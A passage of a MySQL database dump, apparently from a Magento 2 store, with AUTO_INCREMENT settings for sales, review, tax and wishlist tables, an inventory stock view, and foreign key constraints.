  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID';

--
-- AUTO_INCREMENT for table `report_viewed_product_aggregated_monthly`
--
ALTER TABLE `report_viewed_product_aggregated_monthly`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID';

--
-- AUTO_INCREMENT for table `report_viewed_product_aggregated_yearly`
--
ALTER TABLE `report_viewed_product_aggregated_yearly`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID';

--
-- AUTO_INCREMENT for table `report_viewed_product_index`
--
ALTER TABLE `report_viewed_product_index`
  MODIFY `index_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Index ID', AUTO_INCREMENT=29714;

--
-- AUTO_INCREMENT for table `review`
--
ALTER TABLE `review`
  MODIFY `review_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Review ID', AUTO_INCREMENT=1646;

--
-- AUTO_INCREMENT for table `review_detail`
--
ALTER TABLE `review_detail`
  MODIFY `detail_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Review detail ID', AUTO_INCREMENT=1646;

--
-- AUTO_INCREMENT for table `review_entity`
--
ALTER TABLE `review_entity`
  MODIFY `entity_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Review entity ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `review_entity_summary`
--
ALTER TABLE `review_entity_summary`
  MODIFY `primary_id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'Summary review entity ID', AUTO_INCREMENT=239;

--
-- AUTO_INCREMENT for table `review_status`
--
ALTER TABLE `review_status`
  MODIFY `status_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Status ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `salesrule`
--
ALTER TABLE `salesrule`
  MODIFY `rule_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `salesrule_coupon`
--
ALTER TABLE `salesrule_coupon`
  MODIFY `coupon_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Coupon ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `salesrule_coupon_aggregated`
--
ALTER TABLE `salesrule_coupon_aggregated`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID';

--
-- AUTO_INCREMENT for table `salesrule_coupon_aggregated_order`
--
ALTER TABLE `salesrule_coupon_aggregated_order`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID';

--
-- AUTO_INCREMENT for table `salesrule_coupon_aggregated_updated`
--
ALTER TABLE `salesrule_coupon_aggregated_updated`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID';

--
-- AUTO_INCREMENT for table `salesrule_customer`
--
ALTER TABLE `salesrule_customer`
  MODIFY `rule_customer_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rule Customer ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `salesrule_label`
--
ALTER TABLE `salesrule_label`
  MODIFY `label_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Label ID';

--
-- AUTO_INCREMENT for table `sales_bestsellers_aggregated_daily`
--
ALTER TABLE `sales_bestsellers_aggregated_daily`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_bestsellers_aggregated_monthly`
--
ALTER TABLE `sales_bestsellers_aggregated_monthly`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_bestsellers_aggregated_yearly`
--
ALTER TABLE `sales_bestsellers_aggregated_yearly`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_creditmemo`
--
ALTER TABLE `sales_creditmemo`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `sales_creditmemo_comment`
--
ALTER TABLE `sales_creditmemo_comment`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `sales_creditmemo_item`
--
ALTER TABLE `sales_creditmemo_item`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `sales_invoice`
--
ALTER TABLE `sales_invoice`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_invoiced_aggregated`
--
ALTER TABLE `sales_invoiced_aggregated`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `sales_invoiced_aggregated_order`
--
ALTER TABLE `sales_invoiced_aggregated_order`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `sales_invoice_comment`
--
ALTER TABLE `sales_invoice_comment`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `sales_invoice_item`
--
ALTER TABLE `sales_invoice_item`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_order`
--
ALTER TABLE `sales_order`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `sales_order_address`
--
ALTER TABLE `sales_order_address`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT for table `sales_order_aggregated_created`
--
ALTER TABLE `sales_order_aggregated_created`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `sales_order_aggregated_updated`
--
ALTER TABLE `sales_order_aggregated_updated`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `sales_order_item`
--
ALTER TABLE `sales_order_item`
  MODIFY `item_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Item ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `sales_order_payment`
--
ALTER TABLE `sales_order_payment`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `sales_order_status_history`
--
ALTER TABLE `sales_order_status_history`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `sales_order_tax`
--
ALTER TABLE `sales_order_tax`
  MODIFY `tax_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Tax ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_order_tax_item`
--
ALTER TABLE `sales_order_tax_item`
  MODIFY `tax_item_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Tax Item ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_payment_transaction`
--
ALTER TABLE `sales_payment_transaction`
  MODIFY `transaction_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Transaction ID';

--
-- AUTO_INCREMENT for table `sales_refunded_aggregated`
--
ALTER TABLE `sales_refunded_aggregated`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_refunded_aggregated_order`
--
ALTER TABLE `sales_refunded_aggregated_order`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_sequence_meta`
--
ALTER TABLE `sales_sequence_meta`
  MODIFY `meta_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=9;

--
-- AUTO_INCREMENT for table `sales_sequence_profile`
--
ALTER TABLE `sales_sequence_profile`
  MODIFY `profile_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=9;

--
-- AUTO_INCREMENT for table `sales_shipment`
--
ALTER TABLE `sales_shipment`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_shipment_comment`
--
ALTER TABLE `sales_shipment_comment`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `sales_shipment_item`
--
ALTER TABLE `sales_shipment_item`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID', AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sales_shipment_track`
--
ALTER TABLE `sales_shipment_track`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `sales_shipping_aggregated`
--
ALTER TABLE `sales_shipping_aggregated`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `sales_shipping_aggregated_order`
--
ALTER TABLE `sales_shipping_aggregated_order`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `scconnector_google_feed_cl`
--
ALTER TABLE `scconnector_google_feed_cl`
  MODIFY `version_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Version ID', AUTO_INCREMENT=44095;

--
-- AUTO_INCREMENT for table `scconnector_google_remove_cl`
--
ALTER TABLE `scconnector_google_remove_cl`
  MODIFY `version_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Version ID', AUTO_INCREMENT=18916;

--
-- AUTO_INCREMENT for table `search_query`
--
ALTER TABLE `search_query`
  MODIFY `query_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Query ID', AUTO_INCREMENT=13639;

--
-- AUTO_INCREMENT for table `search_synonyms`
--
ALTER TABLE `search_synonyms`
  MODIFY `group_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Synonyms Group ID';

--
-- AUTO_INCREMENT for table `sendfriend_log`
--
ALTER TABLE `sendfriend_log`
  MODIFY `log_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Log ID';

--
-- AUTO_INCREMENT for table `sequence_creditmemo_0`
--
ALTER TABLE `sequence_creditmemo_0`
  MODIFY `sequence_value` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `sequence_creditmemo_1`
--
ALTER TABLE `sequence_creditmemo_1`
  MODIFY `sequence_value` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `sequence_invoice_0`
--
ALTER TABLE `sequence_invoice_0`
  MODIFY `sequence_value` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `sequence_invoice_1`
--
ALTER TABLE `sequence_invoice_1`
  MODIFY `sequence_value` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `sequence_order_0`
--
ALTER TABLE `sequence_order_0`
  MODIFY `sequence_value` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `sequence_order_1`
--
ALTER TABLE `sequence_order_1`
  MODIFY `sequence_value` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `sequence_shipment_0`
--
ALTER TABLE `sequence_shipment_0`
  MODIFY `sequence_value` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `sequence_shipment_1`
--
ALTER TABLE `sequence_shipment_1`
  MODIFY `sequence_value` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `shipping_tablerate`
--
ALTER TABLE `shipping_tablerate`
  MODIFY `pk` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary key', AUTO_INCREMENT=10;

--
-- AUTO_INCREMENT for table `signifyd_case`
--
ALTER TABLE `signifyd_case`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity_id';

--
-- AUTO_INCREMENT for table `sitemap`
--
ALTER TABLE `sitemap`
  MODIFY `sitemap_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Sitemap ID';

--
-- AUTO_INCREMENT for table `store`
--
ALTER TABLE `store`
  MODIFY `store_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Store ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `store_group`
--
ALTER TABLE `store_group`
  MODIFY `group_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Group ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `store_website`
--
ALTER TABLE `store_website`
  MODIFY `website_id` smallint(5) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Website ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tax_calculation`
--
ALTER TABLE `tax_calculation`
  MODIFY `tax_calculation_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Tax Calculation ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tax_calculation_rate`
--
ALTER TABLE `tax_calculation_rate`
  MODIFY `tax_calculation_rate_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Tax Calculation Rate ID', AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tax_calculation_rate_title`
--
ALTER TABLE `tax_calculation_rate_title`
  MODIFY `tax_calculation_rate_title_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Tax Calculation Rate Title ID';

--
-- AUTO_INCREMENT for table `tax_calculation_rule`
--
ALTER TABLE `tax_calculation_rule`
  MODIFY `tax_calculation_rule_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Tax Calculation Rule ID', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tax_class`
--
ALTER TABLE `tax_class`
  MODIFY `class_id` smallint(6) NOT NULL AUTO_INCREMENT COMMENT 'Class ID', AUTO_INCREMENT=10;

--
-- AUTO_INCREMENT for table `tax_order_aggregated_created`
--
ALTER TABLE `tax_order_aggregated_created`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tax_order_aggregated_updated`
--
ALTER TABLE `tax_order_aggregated_updated`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'ID', AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `theme`
--
ALTER TABLE `theme`
  MODIFY `theme_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Theme identifier', AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `theme_file`
--
ALTER TABLE `theme_file`
  MODIFY `theme_files_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Theme files identifier';

--
-- AUTO_INCREMENT for table `translation`
--
ALTER TABLE `translation`
  MODIFY `key_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Key ID of Translation';

--
-- AUTO_INCREMENT for table `ui_bookmark`
--
ALTER TABLE `ui_bookmark`
  MODIFY `bookmark_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Bookmark identifier', AUTO_INCREMENT=43;

--
-- AUTO_INCREMENT for table `url_rewrite`
--
ALTER TABLE `url_rewrite`
  MODIFY `url_rewrite_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Rewrite ID', AUTO_INCREMENT=913;

--
-- AUTO_INCREMENT for table `variable`
--
ALTER TABLE `variable`
  MODIFY `variable_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Variable ID';

--
-- AUTO_INCREMENT for table `variable_value`
--
ALTER TABLE `variable_value`
  MODIFY `value_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Variable Value ID';

--
-- AUTO_INCREMENT for table `vault_payment_token`
--
ALTER TABLE `vault_payment_token`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Entity ID';

--
-- AUTO_INCREMENT for table `vertex_custom_option_flex_field`
--
ALTER TABLE `vertex_custom_option_flex_field`
  MODIFY `entity_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Map Entity ID';

--
-- AUTO_INCREMENT for table `vertex_taxrequest`
--
ALTER TABLE `vertex_taxrequest`
  MODIFY `request_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `weee_tax`
--
ALTER TABLE `weee_tax`
  MODIFY `value_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Value ID';

--
-- AUTO_INCREMENT for table `widget`
--
ALTER TABLE `widget`
  MODIFY `widget_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Widget ID';

--
-- AUTO_INCREMENT for table `widget_instance`
--
ALTER TABLE `widget_instance`
  MODIFY `instance_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Instance ID', AUTO_INCREMENT=27;

--
-- AUTO_INCREMENT for table `widget_instance_page`
--
ALTER TABLE `widget_instance_page`
  MODIFY `page_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Page ID', AUTO_INCREMENT=27;

--
-- AUTO_INCREMENT for table `wishlist`
--
ALTER TABLE `wishlist`
  MODIFY `wishlist_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Wishlist ID', AUTO_INCREMENT=128;

--
-- AUTO_INCREMENT for table `wishlist_item`
--
ALTER TABLE `wishlist_item`
  MODIFY `wishlist_item_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Wishlist item ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `wishlist_item_option`
--
ALTER TABLE `wishlist_item_option`
  MODIFY `option_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Option ID', AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `yotpo_order_status_history`
--
ALTER TABLE `yotpo_order_status_history`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Id';

--
-- AUTO_INCREMENT for table `yotpo_rich_snippets`
--
ALTER TABLE `yotpo_rich_snippets`
  MODIFY `rich_snippet_id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Id';

--
-- AUTO_INCREMENT for table `yotpo_sync`
--
ALTER TABLE `yotpo_sync`
  MODIFY `sync_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Id';

-- --------------------------------------------------------

--
-- Structure for view `inventory_stock_1`
--
DROP TABLE IF EXISTS `inventory_stock_1`;

CREATE ALGORITHM=UNDEFINED DEFINER=`afridi`@`localhost` SQL SECURITY INVOKER VIEW `inventory_stock_1`  AS SELECT DISTINCT `legacy_stock_status`.`product_id` AS `product_id`, `legacy_stock_status`.`website_id` AS `website_id`, `legacy_stock_status`.`stock_id` AS `stock_id`, `legacy_stock_status`.`qty` AS `quantity`, `legacy_stock_status`.`stock_status` AS `is_salable`, `product`.`sku` AS `sku` FROM (`cataloginventory_stock_status` `legacy_stock_status` join `catalog_product_entity` `product` on(`legacy_stock_status`.`product_id` = `product`.`entity_id`)) ;

--
-- Constraints for dumped tables
--

--
-- Constraints for table `admin_passwords`
--
ALTER TABLE `admin_passwords`
  ADD CONSTRAINT `ADMIN_PASSWORDS_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE;

--
-- Constraints for table `admin_user_session`
--
ALTER TABLE `admin_user_session`
  ADD CONSTRAINT `ADMIN_USER_SESSION_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE;

--
-- Constraints for table `adobe_stock_asset`
--
ALTER TABLE `adobe_stock_asset`
  ADD CONSTRAINT `ADOBE_STOCK_ASSET_CATEGORY_ID_ADOBE_STOCK_CATEGORY_ID` FOREIGN KEY (`category_id`) REFERENCES `adobe_stock_category` (`id`) ON DELETE SET NULL,
  ADD CONSTRAINT `ADOBE_STOCK_ASSET_CREATOR_ID_ADOBE_STOCK_CREATOR_ID` FOREIGN KEY (`creator_id`) REFERENCES `adobe_stock_creator` (`id`) ON DELETE SET NULL,
  ADD CONSTRAINT `ADOBE_STOCK_ASSET_MEDIA_GALLERY_ID_MEDIA_GALLERY_ASSET_ID` FOREIGN KEY (`media_gallery_id`) REFERENCES `media_gallery_asset` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `adobe_user_profile`
--
ALTER TABLE `adobe_user_profile`
  ADD CONSTRAINT `ADOBE_USER_PROFILE_ADMIN_USER_ID_ADMIN_USER_USER_ID` FOREIGN KEY (`admin_user_id`) REFERENCES `admin_user` (`user_id`) ON DELETE CASCADE;

--
-- Constraints for table `amazon_customer`
--
ALTER TABLE `amazon_customer`
  ADD CONSTRAINT `AMAZON_CUSTOMER_CUSTOMER_ID_CUSTOMER_ENTITY_ENTITY_ID` FOREIGN KEY (`customer_id`) REFERENCES `customer_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `amazon_quote`
--
ALTER TABLE `amazon_quote`
  ADD CONSTRAINT `AMAZON_QUOTE_QUOTE_ID_QUOTE_ENTITY_ID` FOREIGN KEY (`quote_id`) REFERENCES `quote` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `amazon_sales_order`
--
ALTER TABLE `amazon_sales_order`
  ADD CONSTRAINT `AMAZON_SALES_ORDER_ORDER_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`order_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `authorization_rule`
--
ALTER TABLE `authorization_rule`
  ADD CONSTRAINT `AUTHORIZATION_RULE_ROLE_ID_AUTHORIZATION_ROLE_ROLE_ID` FOREIGN KEY (`role_id`) REFERENCES `authorization_role` (`role_id`) ON DELETE CASCADE;

--
-- Constraints for table `cataloginventory_stock_item`
--
ALTER TABLE `cataloginventory_stock_item`
  ADD CONSTRAINT `CATINV_STOCK_ITEM_PRD_ID_CAT_PRD_ENTT_ENTT_ID` FOREIGN KEY (`product_id`) REFERENCES `catalog_product_entity` (`entity_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CATINV_STOCK_ITEM_STOCK_ID_CATINV_STOCK_STOCK_ID` FOREIGN KEY (`stock_id`) REFERENCES `cataloginventory_stock` (`stock_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalogrule_customer_group`
--
ALTER TABLE `catalogrule_customer_group`
  ADD CONSTRAINT `CATALOGRULE_CUSTOMER_GROUP_RULE_ID_CATALOGRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `catalogrule` (`rule_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CATRULE_CSTR_GROUP_CSTR_GROUP_ID_CSTR_GROUP_CSTR_GROUP_ID` FOREIGN KEY (`customer_group_id`) REFERENCES `customer_group` (`customer_group_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalogrule_website`
--
ALTER TABLE `catalogrule_website`
  ADD CONSTRAINT `CATALOGRULE_WEBSITE_RULE_ID_CATALOGRULE_RULE_ID` FOREIGN KEY (`rule_id`) REFERENCES `catalogrule` (`rule_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CATALOGRULE_WEBSITE_WEBSITE_ID_STORE_WEBSITE_WEBSITE_ID` FOREIGN KEY (`website_id`) REFERENCES `store_website` (`website_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalogsearch_recommendations`
--
ALTER TABLE `catalogsearch_recommendations`
  ADD CONSTRAINT `CATALOGSEARCH_RECOMMENDATIONS_QUERY_ID_SEARCH_QUERY_QUERY_ID` FOREIGN KEY (`query_id`) REFERENCES `search_query` (`query_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CATALOGSEARCH_RECOMMENDATIONS_RELATION_ID_SEARCH_QUERY_QUERY_ID` FOREIGN KEY (`relation_id`) REFERENCES `search_query` (`query_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_category_entity_datetime`
--
ALTER TABLE `catalog_category_entity_datetime`
  ADD CONSTRAINT `CATALOG_CATEGORY_ENTITY_DATETIME_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_DTIME_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_DTIME_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_category_entity_decimal`
--
ALTER TABLE `catalog_category_entity_decimal`
  ADD CONSTRAINT `CATALOG_CATEGORY_ENTITY_DECIMAL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_DEC_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_DEC_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_category_entity_int`
--
ALTER TABLE `catalog_category_entity_int`
  ADD CONSTRAINT `CATALOG_CATEGORY_ENTITY_INT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_INT_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_INT_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_category_entity_text`
--
ALTER TABLE `catalog_category_entity_text`
  ADD CONSTRAINT `CATALOG_CATEGORY_ENTITY_TEXT_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_TEXT_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_TEXT_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_category_entity_varchar`
--
ALTER TABLE `catalog_category_entity_varchar`
  ADD CONSTRAINT `CATALOG_CATEGORY_ENTITY_VARCHAR_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_VCHR_ATTR_ID_EAV_ATTR_ATTR_ID` FOREIGN KEY (`attribute_id`) REFERENCES `eav_attribute` (`attribute_id`) ON DELETE CASCADE,
  ADD CONSTRAINT `CAT_CTGR_ENTT_VCHR_ENTT_ID_CAT_CTGR_ENTT_ENTT_ID` FOREIGN KEY (`entity_id`) REFERENCES `catalog_category_entity` (`entity_id`) ON DELETE CASCADE;

--
-- Constraints for table `catalog_category_product`
--
ALTER TABLE `catalog_category_product`
